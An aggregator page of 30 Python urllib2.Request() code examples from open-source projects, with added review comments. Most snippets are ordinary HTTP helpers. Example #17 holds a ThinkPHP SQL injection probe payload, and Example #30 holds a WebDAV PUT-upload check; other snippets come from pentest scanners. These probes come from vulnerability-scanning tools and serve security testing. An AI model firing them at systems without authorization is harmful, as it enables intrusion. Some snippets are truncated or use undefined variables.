Python urllib2.Request() Examples

The following are 30 code examples of urllib2.Request(). You can vote up the ones you like or vote down the ones you don't like, and go to the original project or source file by following the links above each example. You may also want to check out all available functions and classes of the urllib2 module, or try the search function.
Example #1
Source File: senddata.py    From PiPark with GNU General Public License v2.0 7 votes vote down vote up
def post_request(vals, url):
    """
    Build and send a POST request.

    Args:
        vals: Dictionary of (field, value) pairs for the POST
            request.
        url: URL to send the data to.

    Returns:
        Dictionary of the decoded JSON response, or a dictionary with
        "error"/"error_code" keys on HTTP failure.
    """
    import json  # local import: used only for decoding the reply

    # urlencode the form fields; passing a data argument to Request
    # makes urllib2 issue a POST instead of a GET.
    data = urllib.urlencode(vals)

    try:
        request  = urllib2.Request(url, data)
        response = urllib2.urlopen(request)
    except urllib2.HTTPError as err:  # 'as' form: valid on Python 2.6+ and 3
        return {"error": err.reason, "error_code": err.code}
    # BUG FIX: the original fell through and returned None on success even
    # though the docstring promises the JSON response; decode and return it.
    return json.load(response)
Example #2
Source File: utils.py    From script.module.inputstreamhelper with MIT License 6 votes vote down vote up
def _http_request(url, headers=None, time_out=10):
    """Perform an HTTP request and return request"""
    log(0, 'Request URL: {url}', url=url)

    # Build the request up front; Request() itself raises neither HTTPError
    # nor URLError, so moving it out of the try changes nothing.
    request = Request(url, headers=headers) if headers else Request(url)

    try:
        response = urlopen(request, timeout=time_out)
        log(0, 'Response code: {code}', code=response.getcode())
        if 400 <= response.getcode() < 600:
            raise HTTPError('HTTP %s Error for url: %s' % (response.getcode(), url), response=response)
    except (HTTPError, URLError) as err:
        log(2, 'Download failed with error {}'.format(err))
        # Internet down, try again?
        retry = yesno_dialog(localize(30004), '{line1}\n{line2}'.format(line1=localize(30063), line2=localize(30065)))
        return _http_request(url, headers, time_out) if retry else None

    return response
Example #3
Source File: reverseip.py    From sqliv with GNU General Public License v3.0 6 votes vote down vote up
def reverseip(url):
    """return domains from given the same server"""
    # NOTE(review): Python 2 only (`except X, e`, `print >>` statement,
    # urllib2/urllib modules).

    # get only domain name
    # When the input has no scheme, urlparse puts "example.com/x" entirely
    # into .path, so fall back to the first path segment.
    url = urlparse(url).netloc if urlparse(url).netloc != '' else urlparse(url).path.split("/")[0]

    source = "http://domains.yougetsignal.com/domains.php"
    useragent = useragents.get()
    contenttype = "application/x-www-form-urlencoded; charset=UTF-8"

    # POST method
    # NOTE(review): `opener` is built but never used -- urlopen() below goes
    # through the default opener.
    opener = urllib2.build_opener(
        urllib2.HTTPHandler(), urllib2.HTTPSHandler())
    data = urllib.urlencode([('remoteAddress', url), ('key', '')])

    request = urllib2.Request(source, data)
    request.add_header("Content-type", contenttype)
    request.add_header("User-Agent", useragent)

    try:
        result = urllib2.urlopen(request).read()

    except urllib2.HTTPError, e:
        print >> sys.stderr, "[{}] HTTP error".format(e.code)
    # NOTE(review): `result` is never returned -- this snippet appears
    # truncated; the docstring promises a list of domains.
Example #4
Source File: bip-0070-payment-protocol.py    From checklocktimeverify-demos with GNU General Public License v3.0 6 votes vote down vote up
def payment_ack(serialized_Payment_message):
    """Generates a PaymentACK object, captures client refund address and returns a message"""

    pao = o.PaymentACK()
    pao.payment.ParseFromString(serialized_Payment_message)
    pao.memo = 'String shown to user after payment confirmation'

    # Refund address from the first output script the client supplied.
    # NOTE(review): computed but unused in the visible code -- confirm the
    # original project consumes it elsewhere.
    refund_address = CBitcoinAddress.from_scriptPubKey(CScript(pao.payment.refund_to[0].script))

    sds_pa = pao.SerializeToString()

    # BUG FIX: the original used open(...).write(...) and leaked the handle;
    # a context manager guarantees the blob is flushed and closed before the
    # file: Request below reads it.
    with open('sds_pa_blob', 'wb') as blob_file:
        blob_file.write(sds_pa)
    headers = {'Content-Type' : 'application/bitcoin-payment', 'Accept' : 'application/bitcoin-paymentack'}
    # Despite the name, this is a urllib2.Request for a file: URL, not an
    # HTTP response object.
    http_response_object = urllib2.Request('file:sds_pa_blob', None, headers)

    return http_response_object
Example #5
Source File: yahoo.py    From sqliv with GNU General Public License v3.0 6 votes vote down vote up
def search(self, query, per_page=10, pages=1):
        """search urls from yahoo search

        Fetches `pages` result pages of `per_page` hits each and returns the
        accumulated list of parsed links.
        """

        # store searched urls
        urls = []

        for page in range(pages):
            # BUG FIX: the original computed the result offset from the
            # constant `pages` instead of the loop variable `page`, so every
            # iteration requested the exact same page of results.
            yahoosearch = self.yahoosearch % (query, per_page, (page + 1) * 10)

            request = urllib2.Request(yahoosearch)
            request.add_header("Content-type", self.contenttype)
            request.add_header("User-Agent", self.useragent)

            result = urllib2.urlopen(request).read()
            urls += self.parse_links(result)

        return urls
Example #6
Source File: L.E.S.M.A. - Fabrica de Noobs Speedtest.py    From L.E.S.M.A with Apache License 2.0 6 votes vote down vote up
def build_request(url, data=None, headers=None, bump=''):
	"""Build a urllib2 request object

	This function automatically adds a User-Agent header to all requests

	"""

	if not USER_AGENT:
		build_user_agent()

	headers = headers or {}

	# Prepend the scheme when the caller passed a scheme-relative URL.
	schemed_url = ('%s%s' % (SCHEME, url)) if url[0] == ':' else url

	delim = '&' if '?' in url else '?'

	# WHO YOU GONNA CALL? CACHE BUSTERS!
	# Append a millisecond timestamp so intermediaries cannot serve a
	# cached copy.
	final_url = '%s%sx=%s.%s' % (schemed_url, delim,
								 int(timeit.time.time() * 1000),
								 bump)

	headers.update({
		'User-Agent': USER_AGENT,
		'Cache-Control': 'no-cache',
	})

	printer('%s %s' % (('GET', 'POST')[bool(data)], final_url),
			debug=True)

	return Request(final_url, data=data, headers=headers)
Example #7
Source File: krasfs.py    From tdw with GNU General Public License v3.0 6 votes vote down vote up
def upd(category, sort, str):
		"""Fetch a fresh search key from krasfs.ru.

		NOTE(review): `category` and `sort` are unused, `str` shadows the
		builtin, and the urlencoded `post` payload is built but never sent.
		"""
		post = urllib.urlencode({'checkbox_ftp':'on', 'checkbox_tor':'on','word':str})
		# The '#url, post)' remnant below suggests the POST data argument was
		# commented out at some point; this request is a plain GET.
		request = urllib2.Request('http://krasfs.ru/search.php?key=newkey')#url, post)

		request.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)')
		request.add_header('Host',    'www.krasfs.ru')
		request.add_header('Accept', '*/*')
		request.add_header('Accept-Language', 'ru-RU')
		request.add_header('Referer',    'http://www.krasfs.ru')

		try:
			f = urllib2.urlopen(request)
			html = f.read()
			# Strip newlines so the substring search below spans lines.
			html = html.replace(chr(10),"")
			n=html.find("<newkey>")
			k=html.find("</newkey>")
			key = html[n+8:k]
		except IOError, e:
			if hasattr(e, 'reason'):
				print 'We failed to reach a server. Reason: '+ e.reason
			elif hasattr(e, 'code'):
				print 'The server couldn\'t fulfill the request. Error code: '+ e.code
			# Hard-coded fallback key used when the server is unreachable.
			key = "59165b78-bf91-11e1-86bf-c6ab051766ba"
		# NOTE(review): snippet appears truncated -- `key` is never returned.
Example #8
Source File: metadata.py    From awesome-zio with Apache License 2.0 6 votes vote down vote up
def query(owner, name):
    """Return (stargazers, days-since-update) for a GitHub repository.

    Returns random data when `fake` is set, and (None, None) when the
    GitHub API call fails.
    """
    # Portability fix, consistent with the awesome-scala twin of this
    # function: print() calls and `except ... as e` work on Python 2.6+
    # and Python 3; the original `print '...'` / `except X, e` forms are
    # Python-2-only syntax.
    if fake:
        print('    {0}/{1}: ok'.format(owner, name))
        return (random.randint(1, 1000), random.randint(1, 300))
    else:
        try:
            req = urllib2.Request('https://api.github.com/repos/{0}/{1}'.format(owner, name))
            if user is not None and token is not None:
                # Basic auth raises the GitHub API rate limit.
                b64 = base64.encodestring('{0}:{1}'.format(user, token)).replace('\n', '')
                req.add_header("Authorization", "Basic {0}".format(b64))
            u = urllib2.urlopen(req)
            j = json.load(u)
            t = datetime.datetime.strptime(j['updated_at'], "%Y-%m-%dT%H:%M:%SZ")
            days = max(int((now - t).days), 0)
            print('    {0}/{1}: ok'.format(owner, name))
            return (int(j['stargazers_count']), days)
        except urllib2.HTTPError as e:
            print('    {0}/{1}: FAILED'.format(owner, name))
            return (None, None)
Example #9
Source File: proxy.py    From plugin.video.ustvvod with GNU General Public License v2.0 6 votes vote down vote up
def serveFile(self, fURL, sendData, httphandler = None, cookienum = 0):
		cj = cookielib.LWPCookieJar(ustvpaths.COOKIE % str(cookienum))
		if httphandler is None:
			opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
		else:
			opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj), httphandler)
		request = urllib2.Request(url = fURL)
		sheaders = self.decodeHeaderString(self.headers.headers)
		del sheaders['Host']
		sheaders['User-Agent'] = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'
		for key in sheaders:
			opener.addheaders = [(key, sheaders[key])]
		if os.path.isfile(ustvpaths.COOKIE % str(cookienum)):
			cj.load(ignore_discard = True)
			cj.add_cookie_header(request)
		response = opener.open(request, timeout = TIMEOUT)
		self.send_response(200)
		headers = response.info()
		for key in headers:
			try:
				self.send_header(key, headers[key])
			except Exception, e:
				print "Exception: ", e
				pass 
Example #10
Source File: dirtester.py    From pythonpentest with BSD 3-Clause "New" or "Revised" License 6 votes vote down vote up
def host_test(filename, host):
    """Issue a GET against host/<line> for every line in *filename*.

    Targets that respond have their response headers appended to
    headrequests.log; failures are reported as invalid.
    """
    logname = "headrequests.log"  # renamed from `file`: don't shadow the builtin
    # Line-buffered instead of the original's unbuffered 0: Python 3 forbids
    # unbuffered text-mode files, and line buffering still flushes promptly.
    log = open(logname, 'a', 1)
    # NOTE(review): the original also printed the *log* file name here, not
    # the wordlist being read -- behavior preserved.
    print("[*] Reading file %s" % logname)
    with open(filename) as f:
        locations = f.readlines()
    for item in locations:
        target = host + "/" + item
        try:
            request = urllib2.Request(target)
            request.get_method = lambda : 'GET'
            response = urllib2.urlopen(request)
        except Exception:
            # Narrowed from a bare `except:` so SystemExit and
            # KeyboardInterrupt are no longer swallowed.
            print("[-] %s is invalid" % str(target.rstrip('\n')))
            response = None
        if response is not None:
            print("[+] %s is valid" % str(target.rstrip('\n')))
            details = response.info()
            log.write(str(details))
    log.close()
Example #11
Source File: virustotal.py    From LinuxEmergency with MIT License 6 votes vote down vote up
def _file_rescan(self,_id):
        _string = ''
        if isinstance(_id,list):
            for sid in _id:
                _string += "%s,"%sid
        else:
            _string = '%s,'%str(_id)
        _string = _string[0:-1]
        _parameters = {"resource":_string,"apikey":self._key}
        try:
            data = urllib.urlencode(_parameters)
            _request = urllib2.Request("https://www.virustotal.com/vtapi/v2/file/rescan",data)
            _response = urllib2.urlopen(_request)
            _json = _response.read()
        except Exception, reason:
            return None 
Example #12
Source File: run.py    From github-stats with MIT License 6 votes vote down vote up
def check_for_update():
  """Ping CORE_VERSION_URL for update info, at most once per calendar day."""
  day_fmt = '%Y-%m-%d'
  if os.path.exists(FILE_UPDATE):
    checked = datetime.utcfromtimestamp(os.path.getmtime(FILE_UPDATE))
    if checked.strftime(day_fmt) == datetime.utcnow().strftime(day_fmt):
      return  # already checked today
  try:
    # Touch the marker file first so a failed request still counts as
    # today's check.
    with open(FILE_UPDATE, 'a'):
      os.utime(FILE_UPDATE, None)
    payload = urllib.urlencode({'version': __version__})
    response = urllib2.urlopen(urllib2.Request(CORE_VERSION_URL, payload))
    with open(FILE_UPDATE, 'w') as update_json:
      update_json.write(response.read())
  except (urllib2.HTTPError, urllib2.URLError):
    pass  # best-effort: the update check must never break the tool
Example #13
Source File: metadata.py    From awesome-scala with Apache License 2.0 6 votes vote down vote up
def query(owner, name):
    """Fetch (stars, days-since-update) for owner/name via the GitHub API.

    Returns random data when `fake` is set, (None, None) on HTTP failure.
    """
    if fake:
        print("    {0}/{1}: ok".format(owner, name))
        return (random.randint(1, 1000), random.randint(1, 300))
    try:
        api_url = "https://api.github.com/repos/{0}/{1}".format(owner, name)
        req = urllib2.Request(api_url)
        if user is not None and token is not None:
            # Authenticated requests get a higher API rate limit.
            credentials = "{0}:{1}".format(user, token)
            b64 = base64.encodestring(credentials).replace("\n", "")
            req.add_header("Authorization", "Basic {0}".format(b64))
        payload = json.load(urllib2.urlopen(req))
        updated = datetime.datetime.strptime(payload["updated_at"], "%Y-%m-%dT%H:%M:%SZ")
        days = max(int((now - updated).days), 0)
        print("    {0}/{1}: ok".format(owner, name))
        return (int(payload["stargazers_count"]), days)
    except urllib2.HTTPError as e:
        print("    {0}/{1}: FAILED".format(owner, name))
        return (None, None)
Example #14
Source File: client.py    From d6tpipe with MIT License 6 votes vote down vote up
def _make_request(self, opener, request, timeout=None):
        """Make the API call and return the response. This is separated into
           it's own function, so we can mock it easily for testing.

        :param opener:
        :type opener:
        :param request: url payload to request
        :type request: urllib.Request object
        :param timeout: timeout value or None
        :type timeout: float
        :return: urllib response
        """
        timeout = timeout or self.timeout
        try:
            return opener.open(request, timeout=timeout)
        except HTTPError as err:
            exc = handle_error(err)
            return exc 
Example #15
Source File: sosac.py    From plugin.video.sosac.ph with GNU General Public License v2.0 6 votes vote down vote up
def probe_html5(self, result):
        """Fetch result['url'] without following redirects; on HTTP 200 the
        response body replaces result['url']."""

        class NoRedirectHandler(urllib2.HTTPRedirectHandler):
            # Hand back the raw 3xx response instead of following it.

            def http_error_302(self, req, fp, code, msg, headers):
                infourl = urllib.addinfourl(fp, headers, req.get_full_url())
                infourl.status = code
                infourl.code = code
                return infourl

            # Every other redirect status behaves exactly like 302.
            http_error_300 = http_error_302
            http_error_301 = http_error_302
            http_error_303 = http_error_302
            http_error_307 = http_error_302

        # NOTE: installs the opener globally for this process.
        urllib2.install_opener(urllib2.build_opener(NoRedirectHandler()))

        req = urllib2.Request(result['url'], headers=result['headers'])
        resp = urllib2.urlopen(req)
        if resp.code == 200:
            result['url'] = resp.read()
        return result
Example #16
Source File: server.py    From pydnschain with Mozilla Public License 2.0 6 votes vote down vote up
def lookup(self, name, host_override=None):
        """
        Looks up a name from the DNSChain server. Throws exception if the
        data is not valid JSON or if the namecoin entry does not exist in the
        blockchain.

        @param name: The name to lookup, e.g. 'id/dionyziz', note this $NAMESPACE/$NAME
        format is not guaranteed.  Additionally the caller must perform appropriate url
        encoding _before_ the name is passed to urllib2.urlopen
        @param host_override: optional Host header value used instead of the
        default in self.headers
        """
        # NOTE(review): mutating self.headers persists the override across
        # later calls on this instance.
        if host_override is not None:
            self.headers['Host'] = host_override
        full_url = "http://%s/%s" % (self.addr, name)
        request = urllib2.Request(full_url, None, self.headers)
        try:
            response = urllib2.urlopen(request)
        except urllib2.HTTPError, e:
            if e.code == 404:
                e = DataNotFound(e, name, self.headers['Host'])
            # NOTE(review): after wrapping in DataNotFound, `e.code` and
            # `e.msg` are assumed to still exist on the wrapper -- confirm
            # DataNotFound's interface.
            if e.code < 200 or e.code > 299:
                self._log.debug("%s" % (e.msg,), exc_info=True)
                raise e
        # NOTE(review): snippet appears truncated -- the success path never
        # returns `response`.
Example #17
Source File: ThinkPHP-3.X-5.X-orderby-sql.py    From xunfeng_vul_poc with GNU General Public License v3.0 6 votes vote down vote up
def check(ip, port, timeout):
    """Probe ip:port for the ThinkPHP 3.x `order by` SQL injection.

    Returns a description string when the target echoes the injected
    updatexml() output, otherwise None (all errors are swallowed).
    """
    try:
        socket.setdefaulttimeout(timeout)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        # Raw HTTP request line carrying the injection payload.
        flag = "GET /?order[updatexml(1,concat(0x3a,user()),1)]=1 HTTP/1.1"
        s.send(flag)
        time.sleep(1)
        data = s.recv(1024)
        s.close()
        if 'GET' in data:
            url = 'http://' + ip + ":" + str(port) + '/?order[updatexml(1,concat(0x3a,user()),1)]=1'
            request = urllib2.Request(url)
            res_html = urllib2.urlopen(request, timeout=timeout).read(204800)
            # The injected user() output contains 'root' on a default setup.
            if 'root' in res_html:
                return u"ThinkPHP 3.X order by注入漏洞"


    except Exception:  # 'except Exception, e' was Python-2-only syntax; e was unused
        pass
Example #18
Source File: zooqle.py    From search-plugins with GNU General Public License v2.0 6 votes vote down vote up
def retrieve_url_nodecode(url):
    """ Return the content of the url page as a string.

    On connection failure the error is printed and "" is returned.
    """
    req = Request(url, headers=headers)
    try:
        response = urlopen(req)
    except URLError as errno:
        print(" ".join(("Connection error:", str(errno.reason))))
        print(" ".join(("URL:", url)))
        return ""
    dat = response.read()
    # Check if it is gzipped (magic number 0x1f 0x8b).
    # FIX: use a bytes literal -- on Python 2 b'...' is identical to the old
    # str literal, and on Python 3 (where read() yields bytes) a plain str
    # comparison could never match. Also collapsed the duplicated returns.
    if dat[:2] == b'\037\213':
        # Data is gzip encoded, decode it
        compressedstream = StringIO(dat)
        gzipper = gzip.GzipFile(fileobj=compressedstream)
        dat = gzipper.read()
    return dat
Example #19
Source File: zooqle.py    From search-plugins with GNU General Public License v2.0 6 votes vote down vote up
def retrieve_url_nodecode(url):
    """ Return the content of the url page as a string.

    On connection failure the error is printed and "" is returned.
    """
    req = Request(url, headers=headers)
    try:
        response = urlopen(req)
    except URLError as errno:
        print(" ".join(("Connection error:", str(errno.reason))))
        print(" ".join(("URL:", url)))
        return ""
    dat = response.read()
    # Check if it is gzipped (magic number 0x1f 0x8b).
    # FIX: use a bytes literal -- on Python 2 b'...' is identical to the old
    # str literal, and on Python 3 (where read() yields bytes) a plain str
    # comparison could never match. Also collapsed the duplicated returns.
    if dat[:2] == b'\037\213':
        # Data is gzip encoded, decode it
        compressedstream = StringIO(dat)
        gzipper = gzip.GzipFile(fileobj=compressedstream)
        dat = gzipper.read()
    return dat
Example #20
Source File: aql-to-reference-data.py    From data-import with Apache License 2.0 6 votes vote down vote up
def call_api(self, endpoint, method, headers=None, params=[], data=None, quiet=False):
        """Send an HTTP request to the REST API and return the response.

        On HTTPError the error object (itself response-like) is returned
        rather than raised, so callers can inspect the status.
        NOTE(review): the `quiet` parameter is unused; the code reads
        self.quiet instead.
        """
        # Defensive copy: a mutable default argument ([]) is shared across
        # calls, so never let parse_path see (and possibly mutate) the
        # shared instance.
        params = list(params)

        path = self.parse_path(endpoint, params)

        # If custom headers are not specified we can use the default headers
        if not headers:
            headers = self.headers
        # Send the request and receive the response
        if not self.quiet:
            print('\nSending ' + method + ' request to: ' + 'https://' +self.server_ip+self.base_uri+path+'\n')

        request = Request(
            'https://'+self.server_ip+self.base_uri+path, headers=headers)
        # Override the HTTP verb (urllib only issues GET/POST natively).
        request.get_method = lambda: method
        try:
            #returns response object for opening url.
            return urlopen(request, data)
        except HTTPError as e:
            #an object which contains information similar to a request object
            return e

    # This method constructs the query string 
Example #21
Source File: HttpClient.py    From QBotWebWrap with GNU General Public License v3.0 5 votes vote down vote up
def Post(self, url, data, refer=None):
        """POST urlencoded *data* to *url*, optionally sending a Referer.

        Returns the response body; on HTTPError the error body is returned
        instead (the status code is swallowed).
        """
        try:
            req = urllib2.Request(url, urllib.urlencode(data))
            if refer is not None:  # clearer than `not (refer is None)`
                req.add_header('Referer', refer)
            return urllib2.urlopen(req).read()
        except urllib2.HTTPError as e:  # 'as' form: valid on Python 2.6+ and 3
            return e.read()
Example #22
Source File: test.py    From recruit with Apache License 2.0 5 votes vote down vote up
def extract_wsgi(self, environ, headers):
        """Extract the server's set-cookie headers as cookies into the
        cookie jar.
        """
        # Wrap the WSGI pieces in the request/response shims cookielib expects.
        wsgi_request = U2Request(get_current_url(environ))
        wsgi_response = _TestCookieResponse(headers)
        self.extract_cookies(wsgi_response, wsgi_request)
Example #23
Source File: update_assets.py    From data-import with Apache License 2.0 5 votes vote down vote up
def call_api(self, endpoint, method, headers=None, params=[], data=None, quiet=False):
        """Send an HTTP request to the REST API and return the response.

        Caller-supplied headers are merged with the instance defaults
        (defaults fill in only keys the caller left empty).  On HTTPError
        the error object is returned rather than raised.
        NOTE(review): the `quiet` parameter is unused; the code reads
        self.quiet instead.
        """
        # Defensive copy: a mutable default argument ([]) is shared across
        # calls, so never let parse_path see the shared instance.
        params = list(params)

        path = self.parse_path(endpoint, params)

        # If custom headers are not specified we can merge the default headers.
        # BUG FIX: the original else-branch was indented with tabs while the
        # rest of the file uses spaces -- a TabError under Python 3;
        # normalized to spaces.
        if not headers:
            headers = self.headers
        else:
            for key, value in self.headers.items():
                if headers.get(key, '') == '':
                    headers[key] = value

        # Send the request and receive the response
        if not self.quiet:
            print('\nSending ' + method + ' request to: ' + 'https://' +self.server_ip+self.base_uri+path+'\n')

        request = Request(
            'https://'+self.server_ip+self.base_uri+path, headers=headers)
        # Override the HTTP verb (urllib only issues GET/POST natively).
        request.get_method = lambda: method
        try:
            #returns response object for opening url.
            return urlopen(request, data)
        except HTTPError as e:
            #an object which contains information similar to a request object
            return e

    # This method constructs the query string 
Example #24
Source File: bot.py    From LINE-ChatBot with MIT License 5 votes vote down vote up
def meme(self):
        """Download the image referenced by self.obj['img'] and send it to the group."""
        self.__consts.WANCAK_RAND.close()
        url_image = str(self.obj['img'])
        # The last 38 characters of the URL double as the local file name.
        local_name = url_image[-38:]
        req = urllib2.Request(url_image, headers=self.__consts.CONST_REFERER)
        remote = urllib2.urlopen(req)
        out = open(local_name, 'wb+')
        out.write(str(remote.read()))
        out.close()
        self.group.sendImage(local_name)

    # Running under Linux OS Only. 
Example #25
Source File: HttpClient.py    From QBotWebWrap with GNU General Public License v3.0 5 votes vote down vote up
def Get(self, url, refer=None):
        """GET *url*, optionally sending a Referer header.

        Returns the response body; on HTTPError the error body is returned
        instead (the status code is swallowed).
        """
        try:
            req = urllib2.Request(url)
            if refer is not None:  # clearer than `not (refer is None)`
                req.add_header('Referer', refer)
            return urllib2.urlopen(req).read()
        except urllib2.HTTPError as e:  # 'as' form: valid on Python 2.6+ and 3
            return e.read()
Example #26
Source File: HttpClient.py    From QBotWebWrap with GNU General Public License v3.0 5 votes vote down vote up
def Get(self, url, refer=None):
        """GET *url*, optionally sending a Referer header.

        Returns the response body; on HTTPError the error body is returned
        instead (the status code is swallowed).
        """
        try:
            req = urllib2.Request(url)
            if refer is not None:  # clearer than `not (refer is None)`
                req.add_header('Referer', refer)
            return urllib2.urlopen(req).read()
        except urllib2.HTTPError as e:  # 'as' form: valid on Python 2.6+ and 3
            return e.read()
Example #27
Source File: sosac.py    From plugin.video.sosac.ph with GNU General Public License v2.0 5 votes vote down vote up
def request_last_update(self, url):
        """Fetch *url* and format its Last-Modified header as DD.MM.YYYY.

        On HTTPError the error body is logged and lastmod stays None.
        NOTE(review): snippet appears truncated -- `lastmod` is computed but
        never returned here.
        """
        util.debug('request: %s' % url)
        lastmod = None
        req = urllib2.Request(url)
        req.add_header('User-Agent', util.UA)
        try:
            response = urllib2.urlopen(req)
            # getdate() parses the Last-Modified header into a time tuple
            # (Python 2 mimetools message API).
            lastmod = datetime.datetime(*response.info().getdate('Last-Modified')[:6]).strftime(
                '%d.%m.%Y')
            response.close()
        except urllib2.HTTPError as error:  # 'as' form: valid on Python 2.6+ and 3
            util.debug(error.read())
            error.close()
Example #28
Source File: HttpClient.py    From QBotWebWrap with GNU General Public License v3.0 5 votes vote down vote up
def Post(self, url, data, refer=None):
        """POST urlencoded *data* to *url*, optionally sending a Referer.

        Returns the response body; on HTTPError the error body is returned
        instead (the status code is swallowed).
        """
        try:
            req = urllib2.Request(url, urllib.urlencode(data))
            if refer is not None:  # clearer than `not (refer is None)`
                req.add_header('Referer', refer)
            return urllib2.urlopen(req).read()
        except urllib2.HTTPError as e:  # 'as' form: valid on Python 2.6+ and 3
            return e.read()
Example #29
Source File: jsonrpclib.py    From odoorpc with GNU Lesser General Public License v3.0 5 votes vote down vote up
def __call__(self, url, params=None):
        """Issue a JSON-RPC 2.0 'call' request against *url* and return the
        decoded result (or the raw response when deserialization is off)."""
        if params is None:
            params = {}
        rpc_payload = {
            "jsonrpc": "2.0",
            "method": "call",
            "params": params,
            "id": random.randint(0, 1000000000),
        }
        # A single leading slash is dropped before building the full URL.
        if url.startswith('/'):
            url = url[1:]
        full_url = self._get_full_url(url)
        log_data = get_json_log_data(rpc_payload)
        logger.debug(LOG_JSON_SEND_MSG, {'url': full_url, 'data': log_data})
        request = Request(url=full_url, data=encode_data(json.dumps(rpc_payload)))
        request.add_header('Content-Type', 'application/json')
        response = self._opener.open(request, timeout=self._timeout)
        if not self._deserialize:
            return response
        result = json.load(decode_data(response))
        logger.debug(
            LOG_JSON_RECV_MSG,
            {'url': full_url, 'data': log_data, 'result': result},
        )
        return result
Example #30
Source File: 15-WebDav-getshell.py    From vulscan with MIT License 5 votes vote down vote up
def _verify(self):
        """Probe self.url for the IIS WebDAV PUT-upload vulnerability and
        return the result via self.save_output()."""
        # result dict handed to save_output at the end
        result = {}
        # URL under test
        vul_url = '%s' % self.url

        import socket
        import time
        import urllib2

        # NOTE(review): `ip`, `port` and `timeout` are not defined in this
        # method or its arguments -- as written the connect/urlopen lines
        # raise NameError, which the bare except below silently swallows.
        # They presumably should be derived from self.url; confirm against
        # the original project.
        try:
            socket.setdefaulttimeout(5)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port))
            # Raw HTTP PUT uploading a marker file to test WebDAV write access.
            flag = "PUT /vultest.txt HTTP/1.1\r\nHost: %s:80\r\nContent-Length: 9\r\n\r\nxxscan0\r\n\r\n" % vul_url
            s.send(flag)
            time.sleep(1)
            data = s.recv(1024)
            s.close()
            if 'PUT' in data:
                url = vul_url + '/vultest.txt'
                request = urllib2.Request(url)
                res_html = urllib2.urlopen(request, timeout=timeout).read(204800)
                # If the marker body comes back, the PUT upload succeeded.
                if 'xxscan0' in res_html:
                    print u"iis webdav漏洞"
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = url
                    result['VerifyInfo']['Payload'] = flag
            else:
                # disabled "not vulnerable" diagnostic:
                #print u'\n【不存在漏洞】 ' + url
                pass
        except:
            # NOTE(review): bare except hides every error, including the
            # NameError described above.
            # return url
            pass
        print '[+]15 poc done'
        return self.save_output(result)

    # exploit the vulnerability